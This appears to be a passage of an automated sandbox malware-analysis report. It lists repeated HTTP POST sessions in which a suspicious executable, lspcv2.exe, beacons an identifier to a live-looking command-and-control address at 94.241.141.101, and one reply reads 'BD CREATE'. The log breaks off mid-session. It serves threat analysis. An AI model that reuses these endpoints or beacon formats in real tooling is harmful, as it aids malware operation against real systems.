                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  14192.168.2.44983794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:50.905412912 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:50.910517931 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:51.784434080 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  15192.168.2.44984494.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:51.246505976 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:51.252079010 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:52.134505033 CET175INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:51 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 9
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                  Data Raw: 42 44 20 43 52 45 41 54 45
                                                                                                                  Data Ascii: BD CREATE


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  16192.168.2.44984894.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:51.906451941 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:51.911616087 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:52.794998884 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  17192.168.2.44985194.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:52.246241093 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:52.251518965 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:53.131566048 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:52 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  18192.168.2.44985794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:52.930322886 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:52.937977076 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:53.833594084 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:53 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  19192.168.2.44985894.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:53.304836035 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:53.313968897 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:54.178261042 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  20192.168.2.44986594.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:53.958374023 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:53.964513063 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:54.846697092 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:54 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  21192.168.2.44986694.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:54.296992064 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:54.301855087 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:55.404917002 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  22192.168.2.44987294.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:54.970736980 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:54.976972103 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:55.870425940 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:55 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  23192.168.2.44987994.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:55.999396086 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:56.005045891 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:56.894495010 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:56 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  24192.168.2.44988694.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:56.823956013 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:56.828780890 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:57.697629929 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  25192.168.2.44988794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:57.016057968 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:57.021212101 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:57.896414995 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:57 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  26192.168.2.44989394.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:57.846460104 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:57.853971004 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:58.724276066 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  27192.168.2.44989494.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:58.032351971 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:58.037292004 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:58.930340052 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:58 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  28192.168.2.44990094.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:58.839517117 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:58.844732046 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:59.725203991 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  29192.168.2.44990194.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:59.050777912 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:59.055967093 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:00:59.919243097 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:00:59 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  30192.168.2.44990794.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:00:59.842226982 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:00:59.850084066 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:00.738975048 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  31192.168.2.44990894.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:00.051079988 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:00.056261063 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:00.923630953 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:00 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  32192.168.2.44991494.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:00.854114056 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:00.859056950 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:01.740933895 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  33192.168.2.44991794.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:01.048125029 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:01.053181887 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:01.927894115 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:01 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  34192.168.2.44992294.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:01.854121923 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:01.858995914 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:02.778789043 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  35192.168.2.44992694.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:02.058139086 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:02.063427925 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:02.940126896 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:02 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  36192.168.2.44993294.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:02.902209997 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:02.909358978 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:03.819812059 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  37192.168.2.44993394.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:03.062345982 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:03.069999933 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:03.958962917 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:03 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  38192.168.2.44993994.241.141.101807912C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:03.937846899 CET199OUTPUT /teg/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
                                                                                                                  Nov 14, 2024 15:01:03.943078041 CET25OUTData Raw: 38 35 35 32 37 31 39 45 41 44 38 30 39 45 0d 0a 0d 0a 4e 30 56 30 37 0d 0a
                                                                                                                  Data Ascii: 8552719EAD809EN0V07
                                                                                                                  Nov 14, 2024 15:01:04.842451096 CET166INHTTP/1.1 200 OK
                                                                                                                  Date: Thu, 14 Nov 2024 14:01:04 GMT
                                                                                                                  Server: Apache/2.4.29 (Ubuntu)
                                                                                                                  Content-Length: 0
                                                                                                                  Connection: close
                                                                                                                  Content-Type: text/html; charset=UTF-8


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                  39192.168.2.44994094.241.141.101804020C:\Intrumental\lspcv2.exe
                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                  Nov 14, 2024 15:01:04.077887058 CET199OUTPUT /dm4/publi.php HTTP/1.0
                                                                                                                  Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
                                                                                                                  Content-Type: multipart/form-data
                                                                                                                  User-Agent: Mozilla/4.0
                                                                                                                  Host: 94.241.141.101
                                                                                                                  Content-Length: 25
